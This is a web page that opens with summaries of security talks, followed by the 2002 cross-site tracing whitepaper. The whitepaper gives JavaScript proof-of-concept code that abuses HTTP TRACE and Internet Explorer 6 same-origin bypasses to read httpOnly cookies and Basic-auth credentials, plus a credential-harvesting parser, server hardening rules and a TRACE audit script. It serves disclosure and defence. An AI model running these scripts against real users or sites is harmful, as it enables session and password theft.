The document discusses a new web security technique called cross-site tracing (XST) that can bypass the HTTP-only security feature in Internet Explorer 6 SP1 and perform cross-site scripting attacks. XST exploits the TRACE HTTP request method, which echoes request information to the client, to obtain authentication cookies from other domains over HTTP and HTTPS. While HTTP-only helps prevent cookie access via JavaScript, XST can still access cookies through TRACE requests.
Ransomware has become a serious epidemic affecting businesses of all sizes, and protecting your company is more essential than ever before as the number of ransomware attacks continues to rise.
Wannacry / WannaCrypt ransomware spreads laterally between computers on the same LAN using the ETERNALBLUE exploit of SMB protocol vulnerabilities in Windows systems. It encrypts files on infected systems with various extensions and demands ransom payments in bitcoin. Users and organizations are advised to apply Windows patches, enable firewalls, practice backups, and follow other best practices to prevent infection and data loss from this ransomware.
The document provides an overview of ethical hacking techniques such as advanced scanning with NMAP to identify open ports and operating systems on remote systems. It discusses how tools like Nmap and Angry IP Scanner can be used to scan locally and remotely, and how information gathered can be used to potentially exploit systems. Example exploits discussed include using Netcat to create remote shells and payloads embedded in files like JPEG and MP3 files. The document emphasizes that while the information is presented, actually hacking systems without permission would be illegal.
This document provides an overview of advanced scanning and exploitation techniques for security testing. It discusses using Nmap to scan for open ports and operating systems. The importance of local IP sweeping to find vulnerable systems on a local network is explained. Netcat is demonstrated as a simple way to create a remote shell on another system. Brief examples of shellcode and exploits that can be delivered through media files like JPGs and MP3s are also provided. The conclusion emphasizes that while this information is shown for educational purposes, actually exploiting systems without permission would be illegal.
The document summarizes various free security tools that can be used to gain experience with system and network security. It describes tools for port scanning (Nessus, Saint, Nmap), firewalls (TCP Wrappers, Portsentry), intrusion detection (Snort, Logcheck), and system administration (Sudo, Lsof, Crack). The document recommends using freeware tools to familiarize yourself with security issues before evaluating commercial vendor tools.
Recently a ransomware variant titled “WannaCry” has infected thousands of unpatched endpoints worldwide. This quick presentation will provide a synopsis of what this threat might mean for end users and what actions can be taken in response to this new information.
The document discusses various cybersecurity threats and exploitation techniques. It introduces vulnerability scanning tools like Nessus and Nikto that can identify security weaknesses. It also discusses methods for exploiting vulnerabilities, including through SQL injection, Perl/CGI issues, and cross-site scripting (XSS) attacks. The document promotes finding and sharing hacking tricks and exploits from security conferences and communities.
- What is WannaCry?
- What are its Worm, Exploit, Botnet, Backdoor, Ransomware characteristics?
- WannaCry and the end of the world?
- Malware Prevention?
- Is it a big deal? Comparison with other malware
- WannaCry, a Military and Political Perspective
Armitage – The Ultimate Attack Platform for Metasploit (Ishan Girdhar)
Provides recommendations for exploits and active checks.
Hosts: Shows discovered hosts and lets you manage them.
Consoles: Provides access to Metasploit console and shell access.
Some key areas of the interface:
1. Toolbar: Provides access to common tasks like scanning, exploitation.
2. Assistant Panel: Shows exploit recommendations and active check results.
3. Hosts Panel: Lists discovered hosts and their details.
4. Consoles Panel: Access to Metasploit console and shell access.
5. Status Bar: Shows connection status, database status and more.
So in summary, Armitage takes the raw power of Metasploit and wraps it in an easy to
Days of the Honeynet: Attacks, Tools, Incidents (Anton Chuvakin)
This document summarizes attacks on a Linux honeypot connected to the internet over time. It describes common exploits attempted including longstanding vulnerabilities in RPC statd and WU-FTPD. It also outlines payloads left by attackers like rootkits and tools and provides examples of infiltration incidents where attackers used compromised systems for IRC bots, flooding attacks, and expanding attacks to other systems.
The document provides instructions for a lab on Snort and firewall rules. It describes:
1) Setting up the virtual environment and configuring networking on the CyberOps Workstation VM.
2) Explaining the differences between firewall and IDS rules while noting their similarities, such as both having matching and action components.
3) Having students run commands to start a malware server, use Snort to monitor traffic, and download a file from the server to trigger an alert, observing the alert in the Snort log.
Syed Ubaid Ali Jafri - Black Box Penetration Testing for Associates (Syed Ubaid Ali Jafri)
Syed Ubaid Ali Jafri informed information security students how to conduct black box penetration testing when there is no prior knowledge of the network environment, and covered a few steps and considerations to keep in mind before conducting a black box audit.
Vulnerability scanning evaluates an organization's systems and network to identify vulnerabilities such as missing patches, unnecessary services, weak authentication, and weak encryption. The document discusses using the Advanced IP Scanner tool to perform a network scan on a target Windows Server 2008 system from a Windows 8 attacker system to check for live systems, open ports, and gather information about computers on the local network. It provides instructions on launching Advanced IP Scanner, entering an IP address range to scan, and viewing the scan results.
42 - Malware - Understand the Threat and How to Respond (Thomas Roccia)
Malware is becoming more and more complex. In this talk, presented with Jean-Pierre Lesueur at School 42, we explained the business model behind it as well as provided an understanding of the malware threat.
Defeating spyware and forensics on the BlackBerry (draft) (idsecconf)
This document discusses techniques for defeating spyware and malware on BlackBerry devices by poisoning the data repositories that malware targets in order to collect and transmit private user information. It proposes attacking the source of information rather than trying to detect and remove malware. Specific techniques discussed include POEPFlood, PWNGoal, DDTS, and FMLog. POEPFlood works by introducing fake data to overwhelm repositories with useless information. PWNGoal uses third parties to generate fake messages. DDTS and FMLog aim to hamper forensic analysis by preventing device access or overwriting logs. The techniques are demonstrated for defeating malware targeting email, SMS, call history, and contacts.
Talk of the hour, the WannaCrypt ransomware (shubaira)
The document discusses the WannaCrypt ransomware attack that occurred in May 2017. It describes how WannaCrypt exploited a Windows vulnerability to spread, encrypted files on infected systems, and demanded ransom payments in Bitcoin. The document provides details on the malware components, infection cycle, indicators of infection, and recommendations for prevention and cleanup of infected systems. It also includes definitions of relevant cybersecurity terminology.
The document discusses how hackers can gain access to computer systems and the information within. It describes how hackers use tools like port scanners to find vulnerabilities, and how trojan horse viruses can be used to install remote access software onto a target system without the user's knowledge. Basic tips are provided on how to protect against these kinds of attacks, such as turning off file sharing and being wary of unexpected program files received from others.
Snort Intrusion Detection / Prevention System on PFSense Firewall (Huda Seyam)
This project presents a solution to protect web pages that acquire passwords and user names against HTML brute force: it performs brute force password auditing against web servers that use HTTP authentication with Nmap, and detects this attack using the Snort IDS/IPS on the PFSense firewall.
The WannaCry ransomware outbreak shook the world when it occurred in May 2017.
This slide deck looks at the attack, how it was carried out, and its success rate. It also attempts to figure out who was likely to have been behind this devastating cyber attack.
For more information on this outbreak, take a look at these additional resources:
What you need to know about the WannaCry Ransomware: https://www.symantec.com/connect/blogs/wannacry-3
WannaCry: Ransomware attacks show strong links to Lazarus group: https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group
Can files locked by WannaCry be decrypted: A technical analysis: https://medium.com/threat-intel/wannacry-ransomware-decryption-821c7e3f0a2b
This document provides an introduction to trojans and backdoors, including what they are, how they work, common types of trojans, and methods of detecting trojan activity. Trojans and backdoors allow hackers to send and receive data through open ports to gain control of systems. Common trojan types include remote access trojans, data sending trojans, and trojans that disable security software. Netstat and Wireshark can be used to monitor network activity and detect trojans. Wrappers and defacing applications help disguise trojans by changing file icons or combining with other programs.
This document discusses tools for detecting attacks, including honey pots, anti-spyware tools, and backup/recovery tools. It focuses on KFSensor honeypot software, which acts as a decoy server to detect and study hacker behavior without risk to critical systems. The document also covers NetBus and other Trojans, how anti-spyware software differs from viruses/worms in not self-replicating but exploiting computers for commercial gain, and the importance of backups for recovery from attacks.
CEH v8 Labs Module 10: Denial of Service (Asep Sopyan)
The document describes how to perform a denial-of-service (DoS) attack using hping3. It provides instructions on launching BackTrack 5 r3 in a virtual machine, running hping3 to send a flood of SYN packets to a Windows 7 victim machine, and using Wireshark on the victim to observe the incoming SYN packets. The goal is to overload the victim's resources and render it unavailable by saturating it with external communication requests.
The document provides instructions for performing network enumeration using various tools. It describes enumeration as extracting usernames, machine names, shares, and services from a system. The objectives are to help students enumerate a target network to obtain lists of computers, users, groups, ports, resources, and services. It provides steps to use Nmap and nbtstat to scan IP addresses, identify open ports, determine operating systems, and extract NetBIOS information like computer names and usernames from target machines on the network.
This document provides an overview of ransomware, including what it is, how it spreads, examples of ransomware families, and prevention strategies. Ransomware encrypts files on an infected system and demands payment, usually in cryptocurrency, to decrypt the files. It spreads through spam emails containing malicious attachments or links, compromised websites using exploit kits, and by exploiting vulnerabilities in operating systems. The document demonstrates ransomware infections through snapshots and shares folders. Prevention includes regularly backing up important files, avoiding unsolicited documents, and keeping systems updated.
Ransomware is a type of malware which restricts access to the computer system that it infects, and demands a ransom paid to the creator(s) of the malware in order for the restriction to be removed. It deliberately locks you out of your computer or your files, and then demands money to let you back in.
Basic information: how, why, where, etc.
Software Security (Vulnerabilities) And Physical Security (Nicholas Davis)
The document discusses various types of software vulnerabilities including:
1. Vulnerabilities can result from weak passwords, software bugs, viruses, or insecure user input.
2. Common causes of vulnerabilities are password management flaws, operating system design flaws, software bugs, and unchecked user input.
3. There is debate around how vulnerabilities should be disclosed, with options including full disclosure, responsible disclosure, and limited disclosure.
The document discusses cross-site tracing (XST), a new web security attack technique that can bypass the HTTP-only security mechanism in Internet Explorer 6 SP1. XST uses the HTTP TRACE request method to echo back request headers, including authentication cookies, allowing an attacker to access credentials from any site. The document provides background on the TRACE method and how it is enabled by default on many web servers. It also explains the HTTP-only cookie option that aims to prevent access to cookies via JavaScript but is circumvented by XST.
This document discusses browser security challenges posed by new technologies like HTML5, cross-document messaging, and browser plugins. It summarizes potential attacks like cross-site scripting through relaxed origin policies, browser SQL injection using HTML5 client storage, and using cross-document messaging to enable cross-site communication. The document advocates for the OWASP Intrinsic Group to work with browser vendors to address these issues.
Top 10 Web Hacks
Every year the number and creativity of Web hacks increases, and the damage from these attacks rises exponentially, costing organizations millions every year.
Join this webinar to learn about the latest and most insidious Web-based attacks. The much anticipated list, now in its seventh year, represents exhaustive research conducted by a panel of experienced security industry professionals. Learn the latest of the worst in Web hacks, and how to protect your organization.
This document discusses the top 10 web hacking techniques of 2012. It provides an overview of each technique including CRIME, attacking memcached via SSRF, Chrome addon hacking, bruteforcing PHPSESSID, blended threats using JavaScript, cross-site port attacks, permanently backdooring HTML5 client-side applications using local storage, CAPTCHA re-riding attacks, gaining access to HttpOnly cookies in 2012 through Java applets, and attacking OData through HTTP verb tunneling and navigation properties. The document also discusses the history of past web hacking techniques and provides background information on topics like HttpOnly cookies, XST, and CAPTCHAs.
This talk is a generic but comprehensive overview of security mechanisms, controls and potential attacks in modern browsers. The talk also focuses on new technologies, such as HTML5 and related APIs, to highlight new attack scenarios against browsers.
video demos: http://whitehatsec.com/home/assets/videos/Top10WebHacks_Webinar031711.zip
Many notable and new Web hacking techniques were revealed in 2010. During this presentation, Jeremiah Grossman will describe the technical details of the top hacks from 2010, as well as some of the prevalent security issues emerging in 2011. Attendees will be treated to a step-by-step guided tour of the newest threats targeting today's corporate websites and enterprise users.
The top attacks in 2010 include:
• 'Padding Oracle' Crypto Attack
• Evercookie
• Hacking Auto-Complete
• Attacking HTTPS with Cache Injection
• Bypassing CSRF protections with ClickJacking and HTTP Parameter Pollution
• Universal XSS in IE8
• HTTP POST DoS
• JavaSnoop
CROSS-SITE TRACING (XST)
THE NEW TECHNIQUES AND EMERGING THREATS TO BYPASS CURRENT WEB SECURITY MEASURES USING TRACE AND XSS.
Jeremiah Grossman
Overview
On October 23, 2002, Microsoft issued a press release describing a new browser/server-based protective security measure in Internet Explorer 6 SP1. This new feature, dubbed "httpOnly", helps guard HTTP cookies against XSS (cross-site scripting) attacks. WhiteHat Security, heavily focused on web application security research and technology, began to investigate the feature in order to determine what it meant for web security. First of all, anything that attempts to help prevent the XSS plague on the web is a good thing. Most of us in the web application security field already know the great pains required to prevent the ever-present XSS issues.
After much security review, I posted to Bugtraq stating that the new httpOnly security feature, while effective for its intended purpose, is limited in XSS protection scope: it only prohibits the exposure of cookie data through the "document.cookie" object. Nevertheless, Microsoft has taken an excellent first step in the right direction toward preventing XSS as a whole.
A week later into testing of httpOnly, WhiteHat staff discovered a new web security attack technique that is able not only to bypass the httpOnly mechanism present in IE 6 Service Pack 1, but also to XSS "just about" anything from "just about" anywhere. This technique allows client-side scripting languages such as JavaScript, and possibly other client-side technologies like VBScript, Flash, Java, etc., to access HTTP web authentication credentials (the Authorization header), with the added bonus of achieving this result over SSL. This ability has never before been possible. These new exposures are explained in detail in the following sections.
Background Information
TRACE Request Method
TRACE is simply an input echo mechanism for the HTTP protocol. The request method is commonly used for debugging and other connection analysis activities.
An HTTP TRACE request (request line and headers; the HTTP/1.1 RFC does not allow a TRACE request to carry a body), sent to a TRACE-supporting web server, is answered with a response whose body is the request exactly as the server received it. TRACE provides an easy way to tell what an HTTP client is sending and what the server is receiving. Apache, IIS, and iPlanet all support TRACE as defined by the HTTP/1.1 RFC, and it is enabled by default. Very few system administrators have disabled this request method, either because the method posed no known risk, because default settings were considered good enough, or simply because there was no option to do so.
The following is an example of a TRACE request:
$ telnet foo.bar 80
Trying 127.0.0.1...
Connected to foo.bar.
Escape character is '^]'.
TRACE / HTTP/1.1
Host: foo.bar
X-Header: test

HTTP/1.1 200 OK
Date: Mon, 02 Dec 2002 19:24:51 GMT
Server: Apache/2.0.40 (Unix)
Content-Type: message/http

TRACE / HTTP/1.1
Host: foo.bar
X-Header: test
As shown in the example, the server responded with exactly the information the client sent. At the time of writing, sites with TRACE enabled included:
• www.passport.com
• www.yahoo.com
• www.disney.com
• www.securityfocus.com
• www.redhat.com
• www.go.com
• www.theregister.co.uk
• www.sun.com
• www.oracle.com
• www.ibm.com
(and many other web sites)
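The exchange above, modelled in Node.js as an added example that is not part of the original paper: the response a TRACE-capable server gives to a request carrying a Cookie header and HTTP Basic credentials, the attacker-side parsing that harvests both from the echoed message/http body, and the hardened server behaviour (405, nothing echoed). The host foo.bar, the SESSIONID cookie and the alice:s3cret credential are constructed for the demonstration.

```javascript
'use strict';
// Added example, not code from the original paper. Models the TRACE exchange:
// a TRACE-enabled server echoes the request head back as message/http, so
// whoever can read that body gets the Cookie and Authorization headers the
// browser attached, including cookies flagged httpOnly. All names and
// credentials below are constructed for the demonstration.

// Server side: how a TRACE-supporting server answers. Only the request head
// (request line and headers) is echoed; RFC 2616 forbids a body on TRACE.
function traceResponseFor(rawRequest) {
  const headEnd = rawRequest.indexOf('\r\n\r\n');
  const head = headEnd === -1 ? rawRequest : rawRequest.slice(0, headEnd);
  const body = head + '\r\n';
  return 'HTTP/1.1 200 OK\r\n' +
    'Content-Type: message/http\r\n' +
    'Content-Length: ' + Buffer.byteLength(body) + '\r\n' +
    '\r\n' + body;
}

// Hardened server: TRACE is refused outright and nothing is echoed.
// Returns null for other methods so a caller can fall through to its normal handler.
function hardenedResponseFor(rawRequest) {
  const method = rawRequest.slice(0, rawRequest.indexOf(' '));
  if (method !== 'TRACE') return null;
  return 'HTTP/1.1 405 Method Not Allowed\r\n' +
    'Allow: GET, HEAD, POST\r\n' +
    'Content-Length: 0\r\n\r\n';
}

// Split a raw HTTP response into its body (what the XST script gets to read).
function responseBody(rawResponse) {
  return rawResponse.slice(rawResponse.indexOf('\r\n\r\n') + 4);
}

// Attacker side: pull the Cookie and Authorization headers out of the echoed
// request head, and decode HTTP Basic credentials if present.
function harvestCredentials(traceBody) {
  const result = { cookie: null, authorization: null, basicUser: null, basicPassword: null };
  const headerLines = traceBody.split('\r\n').slice(1); // drop the echoed request line
  for (const line of headerLines) {
    const colon = line.indexOf(':');
    if (colon === -1) continue;
    const name = line.slice(0, colon).trim().toLowerCase();
    const value = line.slice(colon + 1).trim();
    if (name === 'cookie') {
      result.cookie = value;
    } else if (name === 'authorization') {
      result.authorization = value;
      const basic = /^Basic\s+([A-Za-z0-9+/=]+)$/i.exec(value);
      if (basic) {
        const decoded = Buffer.from(basic[1], 'base64').toString('utf8');
        const sep = decoded.indexOf(':');
        result.basicUser = sep === -1 ? decoded : decoded.slice(0, sep);
        result.basicPassword = sep === -1 ? null : decoded.slice(sep + 1);
      }
    }
  }
  return result;
}

// Constructed request: what a browser would send to foo.bar if it held a
// session cookie (set with httpOnly) and the user had authenticated with Basic.
const SAMPLE_REQUEST =
  'TRACE / HTTP/1.1\r\n' +
  'Host: foo.bar\r\n' +
  'Cookie: SESSIONID=abc123; prefs=dark\r\n' +
  'Authorization: Basic ' + Buffer.from('alice:s3cret').toString('base64') + '\r\n' +
  'X-Header: test\r\n' +
  '\r\n';

// Run both servers over the sample and return what an attacker harvests from each.
function demonstrate() {
  const vulnerable = harvestCredentials(responseBody(traceResponseFor(SAMPLE_REQUEST)));
  const hardenedRaw = hardenedResponseFor(SAMPLE_REQUEST);
  const hardened = harvestCredentials(responseBody(hardenedRaw));
  return { vulnerable, hardened, hardenedStatus: hardenedRaw.split('\r\n')[0] };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demonstrate(), null, 2));
}
```

The point of the model is that the echoed body is ordinary response text: any client-side mechanism that can issue a TRACE and read the response gets the Cookie and Authorization values, regardless of what document.cookie is allowed to expose.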
httpOnly Cookie Option
httpOnly is an HTTP cookie attribute used to inform the browser (IE 6 SP1 only, until other browsers support httpOnly) not to allow scripting languages (JavaScript, VBScript, etc.) access to the cookie through the "document.cookie" object, the normal XSS attack target. The syntax of an httpOnly cookie is as follows:
Set-Cookie: name=value; httpOnly
Using JavaScript we can test the effectiveness of the feature. (Code tested in IE 6 SP1.)
<script type="text/javascript">
<!--
// Sets an ordinary cookie, then reads it back through document.cookie.
function normalCookie() {
  document.cookie = "TheCookieName=CookieValue_normal";
  alert(document.cookie);
}
// Sets the same cookie with the httpOnly attribute; in IE 6 SP1 the read-back is empty.
function httpOnlyCookie() {
  document.cookie = "TheCookieName=CookieValue_httpOnly; httpOnly";
  alert(document.cookie);
}
//-->
</script>
<FORM>
<INPUT TYPE=BUTTON OnClick="normalCookie();" VALUE="Display Normal Cookie">
<INPUT TYPE=BUTTON OnClick="httpOnlyCookie();" VALUE="Display HTTPONLY Cookie">
</FORM>
Code Example 1.
Screen Shot 1: After pressing the "Display Normal Cookie" button.
Screen Shot 2: After pressing the "Display HTTPONLY Cookie" button.
By testing the above code, you can quickly see that when the httpOnly attribute is in use, "document.cookie" can still be read, but the returned string is empty. This is a useful security enhancement for many web applications. (Later browsers, following RFC 6265, go further and ignore any attempt to set an HttpOnly cookie from script entirely; the attribute is only honoured when it arrives in a Set-Cookie response header.)
Analysis
The first challenge is to gain access to the cookie data normally read through "document.cookie" while httpOnly is in use. The question became: where else is the data held in "document.cookie" exposed? This is where TRACE becomes useful for our purposes. TRACE echoes the information you send in the HTTP request, and that includes the Cookie header and the web authentication (Authorization) header, since both are simple HTTP headers.
However, forcing Internet Explorer to send a TRACE request is not a simple process, even when first considering an HTML form (METHOD=POST): Internet Explorer does not support request methods other than GET or POST from an HTML form. To resolve this limitation, we had to use extended client-side scripting technologies to create and send a specially formatted HTTP request to a target web server. Many technologies are capable of issuing specially crafted HTTP requests.
<script type="text/javascript">
<!--
// Sends a TRACE request with the XMLHTTP ActiveX control and shows the echoed
// request, including any Cookie/Authorization headers IE attached to it.
function sendTrace() {
  var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
  xmlHttp.open("TRACE", "http://foo.bar", false);
  xmlHttp.send();
  var xmlDoc = xmlHttp.responseText;
  alert(xmlDoc);
}
//-->
</script>
<INPUT TYPE=BUTTON OnClick="sendTrace();" VALUE="Send Trace Request">
Code Example 2. (The URL in the code will need to be changed to the target.)
Screen Shot 3: Results of the TRACE request response from the server. Note the cookie string contained in, and accessible by, a means other than "document.cookie".
The above code, using the XMLHTTP ActiveX control, sends a TRACE request to the target web server. If it supports TRACE, the server echoes the information sent within the HTTP request. Internet Explorer sends its general browser headers by default, and these are displayed in the resulting JavaScript alert window. If your browser happens to hold a cookie for the target domain, or is logged into the target web server using web authentication, you will see your cookies and credentials within the alert. This technique grants the code the ability to bypass "httpOnly", accessing cookie data without the use of "document.cookie". We now have the desired capability to pass sensitive credentials off-domain to a third party and, as stated in the overview, the ability to access web authentication credentials, which was not previously possible from client-side script. To restate, all of this sensitive information remains accessible even over an SSL link.
It is important to note two things at this point. The first is that the ability to make these types of requests from a web browser is NOT limited to Internet Explorer; other web browsers such as Mozilla/Netscape have the ability as well. Specifically, TRACE requests have been achieved in Mozilla using XMLDOM object scripting. The second is that XMLHTTP is only one of several ActiveX controls and other technologies that appear to have this level of control over HTTP within a browser environment. (Current browsers have since closed this avenue: the Fetch standard treats TRACE, TRACK and CONNECT as forbidden methods, and XMLHttpRequest.open() rejects them with a SecurityError, so the client half of this attack no longer works in a modern browser; the server-side echo, and the reason to disable it, remain.)
There is, however, a limiting factor preventing wider escalation of the danger. The browser will NOT allow the TRACE connection to go to anything other than the domain hosting the script: a script served from foo.bar will only be able to TRACE and connect to a foo.bar host. This is a browser-implemented domain restriction security policy (the same-origin policy), and it helps prevent XSS and similar attacks. This limitation does prevent further abuse; however, the hurdle can be bypassed as well, as shown below.
To increase the exposure of the exploit, we need a domain-restriction-bypass vulnerability within Internet Explorer (or the web browser of choice). As it turns out, these issues are quite numerous and are commonly posted to public forums such as Bugtraq. At the time of writing there were known unresolved issues with the IE domain restriction policies. These unpatched Internet Explorer 6 flaws allow the domain restriction security policy to be bypassed and increase the overall severity of the problem. The first IE issue below uses the "external" browser flaw in the caching mechanism, first identified by GreyMagic Security.
<script type="text/javascript">
<!--
// Opens a window on the attacker's own page, keeps a reference to its
// "external" object, navigates the window to the target, then uses the stale
// reference to run script in the target's context (GreyMagic "external" flaw).
function xssDomain() {
  var oWin = open("blank.html", "victim", "width=500,height=400");
  var oVuln = oWin.external;
  oWin.location.href = "http://foo.bar";
  setTimeout(
    function () {
      oVuln.NavigateAndFind('javascript:xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE","http://foo.bar",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;alert("Show all headers for foo.bar including cookie without using document.cookie\n" + xmlDoc);', "", "");
    },
    2000
  );
}
//-->
</script>
<INPUT TYPE=BUTTON OnClick="xssDomain();" VALUE="TRACE XSS Domain">
Code Example 3. (This code will not work after the MS02-068 roll-up, which resolves the issue. However, Code Example 4 below does function as of this writing. URLs in the code will need to be changed to identify a target.)
<script type="text/javascript">
// Abuses an IE showModalDialog flaw: the features string is applied as CSS to the
// dialog that displays the target, and a CSS expression() runs our script there.
function xssDomainTraceRequest() {
  var exampleCode = "var xmlHttp = new ActiveXObject('Microsoft.XMLHTTP');xmlHttp.open('TRACE','http://foo.bar',false);xmlHttp.send();xmlDoc=xmlHttp.responseText;alert(xmlDoc);";
  var target = "http://foo.bar";
  var cExampleCode = encodeURIComponent(exampleCode + ';top.close()');
  var readyCode = 'font-size:expression(execScript(decodeURIComponent("' + cExampleCode + '")))';
  showModalDialog(target, null, readyCode);
}
</script>
<INPUT TYPE=BUTTON OnClick="xssDomainTraceRequest()" VALUE="Show Cookie Information Using TRACE">
Code Example 4. (Functional as of this writing.) This IE issue uses a flaw within "showModalDialog", gathered from Thor Larholm at http://www.pivx.com/. The URLs in the code will need to be changed to identify a target.
Screen Shot 4: Results of the TRACE request response from the server. Note the base64 authentication string contained in the response and now accessible.
These scripts now have the ability to connect to any domain and access cookies and web authentication information, without using document.cookie and without being restricted by the domain security policy. What does this mean in terms of exposure scenarios? Read on.
Exposure Scenarios
We will outline a few exposure scenarios while using varying degrees of security assumptions. Attempting to organize the scenarios by level of risk severity.
Defining some necessary technologies and acronyms to better understand exposure at several levels.
Domain Restriction Bypass (DRB) e ability for a client-side script to bypass domain restriction security policy enabled within a web browser.
HTTP Request Enabling Technology (HRET) Client-side technologies resident within a web browser, which allow for the creation and sending of specially formatted HTTP Requests. ese technologies may include, but not all confirmed, JavaScript, VBScript, Flash, Java, ActiveX, Jscript, Action Script, Shockwave, etc..
TRACE Method Support (TMS): A target web server that currently supports the TRACE request method.
"Credentials" will include cookie data and web authentication credentials.
Scenarios assume the following:
A user visits a malicious web site or views malicious content hosted by a trusted source (message board, web mail, etc.) and loads code similar to code examples 3 & 4.
Scenario 1. (DRB, HRET, TMS)
All the required insecurities are present in today's environment. Code may access any and all of the user's credentials from any domain that supports TRACE, including bypassing httpOnly. XSS "just about" anyone from "just about anywhere".
Scenario 2. (HRET, TMS)
Code may access any and all of the user's credentials from the "hosting code" domain, including bypassing httpOnly.
Scenario 3. (DRB, HRET)
User credentials from the target domain are safe because the server does not support or disallows TRACE. However, other security concerns beyond the scope of this paper are present.
Scenario 4. (HRET)
User credentials from the target domain are safe because the server does not support or disallows TRACE. No other security concerns beyond the scope of this paper persist.
11. General Recommendations
1. Sufficiently patch all web browsers against known domain restriction bypass flaws. This is a more important part of security policy now than ever.
2. Disable or disallow the TRACE Request method on production and development (unless needed) web servers.
3. Web server vendors should update their web server packages to disable TRACE by default.
4. Web server vendors should inform their users on how to disable or disallow TRACE on existing web servers.
5. ActiveX controls supporting arbitrary HTTP requests should be marked unsafe for scripting by default. Other such technology vendors (Flash, Java, Shockwave, VBScript, etc.) should attempt to implement stronger security mechanisms for disallowing unauthorized HTTP requests.
6. Users have the ability to disable all active scripting and increase the safety of their credentials. However, this may negatively impact the functionality of many web sites.
12. Server Specific Recommendations
(Resolutions should be confirmed with the appropriate vendor.)
IIS
• URL Scan
Apache
• Source Code Modification
• Mod_Rewrite Module
RewriteEngine on
RewriteCond %{REQUEST_METHOD} ^TRACE
RewriteRule .* - [F]
(Thank you to Rain Forest Puppy)
** The Limit or LimitExcept directive in the httpd.conf file does not appear to be able to restrict TRACE. **
Netscape iPlanet
(Procedures for removing unwanted Request Methods)
cd ${IPLANET_ROOT}
mkdir secure_lib
cp bin/https/lib/libns-httpd40.so secure_lib
cd secure_lib
emacs libns-httpd40.so
The supported methods appear in lists like: HEAD^@GET^@PUT^@POST^@DELETE^@TRACE^@OPTIONS^@MOVE^@INDEX^@MKDIR^@RMDIR
• Find all occurrences of these lists and change the methods as required to be GET padded with spaces to match the length of the word, i.e. DELETE becomes 'GET   ' (three trailing spaces).
• Edit the start script for the web server to prepend secure_lib to the front of LD_LIBRARY_PATH, i.e. LD_LIBRARY_PATH=${IPLANET_ROOT}/secure_lib:<the rest of the line as it appears in the script>
• Restart the web server and test that it still works!
(Many thanks to Alastair Davie and Robert Rodger.)
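The following is an added example and is not code from the original paper or from any of the vendors above. It makes the two points of this section concrete: what a TRACE-enabled server gives back (the echo shown in Screen Shot 4, Cookie and Authorization headers included), and how to verify after reconfiguring a server that TRACE no longer reflects anything. It uses Python's built-in http.server to stand up two throwaway handlers on localhost, one that echoes like a TRACE-enabled server and one that answers 405, and a small audit function that sends a TRACE with constructed marker values and reports which of them came back. All hosts, ports and credential values are local and made up for the example.

```python
"""Added example (not from the original paper): demonstrate the TRACE echo and
verify that a hardened server no longer reflects request headers.

  * EchoingTraceHandler - behaves like a server with TRACE enabled: it reflects
    the request line and all headers back as message/http.
  * HardenedHandler     - answers TRACE with 405 Method Not Allowed.
  * trace_leaks_headers - audit routine: sends a TRACE carrying constructed
    Cookie and Authorization values and reports which were echoed in the body.
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed marker values; they are not real credentials.
FAKE_COOKIE = "SESSIONID=deadbeef-example"
FAKE_AUTH = "Basic dXNlcjpzZWNyZXQ="  # base64("user:secret"), constructed


class EchoingTraceHandler(BaseHTTPRequestHandler):
    """Simulates a server that supports TRACE: the request is echoed verbatim."""

    def do_TRACE(self):
        echoed = f"{self.requestline}\r\n" + "".join(
            f"{name}: {value}\r\n" for name, value in self.headers.items()
        )
        body = echoed.encode()
        self.send_response(200)
        self.send_header("Content-Type", "message/http")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the example quiet
        pass


class HardenedHandler(BaseHTTPRequestHandler):
    """Refuses TRACE; nothing from the request is reflected."""

    def do_TRACE(self):
        self.send_response(405)
        self.send_header("Allow", "GET, HEAD, POST")
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):
        pass


def start_server(handler):
    """Bind to an ephemeral localhost port and serve in a daemon thread."""
    srv = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def trace_leaks_headers(host, port):
    """Send a TRACE with marker headers; return (status, [names echoed back])."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("TRACE", "/", headers={"Cookie": FAKE_COOKIE, "Authorization": FAKE_AUTH})
    resp = conn.getresponse()
    body = resp.read().decode(errors="replace")
    conn.close()
    markers = (("Cookie", FAKE_COOKIE), ("Authorization", FAKE_AUTH))
    leaked = [name for name, value in markers if value in body]
    return resp.status, leaked


if __name__ == "__main__":
    for label, handler in (("TRACE enabled", EchoingTraceHandler), ("TRACE disabled", HardenedHandler)):
        srv = start_server(handler)
        status, leaked = trace_leaks_headers(*srv.server_address)
        print(f"{label}: HTTP {status}, echoed headers: {leaked or 'none'}")
        srv.shutdown()
```

Run against a real server after applying the mod_rewrite rule or the iPlanet patch above by calling trace_leaks_headers with that host and port: a result of (405, []) or (501, []) means TRACE is refused, while any name in the list means the server is still echoing what the browser sent.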
13. References
Some Answered Questions.
Q: Does this affect only Internet Explorer?
A: No, this new technique may affect all browsers supporting HTTP Request Enabling Technologies (HRET).
Q: Does this exploit technique require ActiveX?
A: ActiveX is used in our examples; however, research has shown that other similar technologies possess the same abilities.
Q: If I turn off Active Scripting, as a user, am I safe?
A: You could be “safer” but not safe. As previously said, other technologies such as Flash and Java may still pose a threat even if Active Scripting is disabled.
Q: As a web server administrator, if I disable TRACE, are my users' credentials safe?
A: Yes, this appears to be the case. Users of your “domain” would be safe against this new technique since your web server no longer echoes sensitive information in TRACE requests.
Q: Are my users' credentials at risk even though my applications are not vulnerable to XSS at the application layer?
A: Yes. The particular attack vector of this XSS issue targets the web server itself rather than the web application layer.
Q: Why should I have to reconfigure my web server? This sounds like a browser client-side issue.
A: The web browsers in use should indeed be secured, as should the web server. However, if the web server itself is not configured to deny TRACE, then the security of the domain credentials rests entirely on the security of the web browser. Not a good idea.
14. Issue Discovery & Disclosure Timeline
November 1, 2002.
httpOnly bypass issue identified.
November 28, 2002.
Increased Exposure identified.
December 4, 2002.
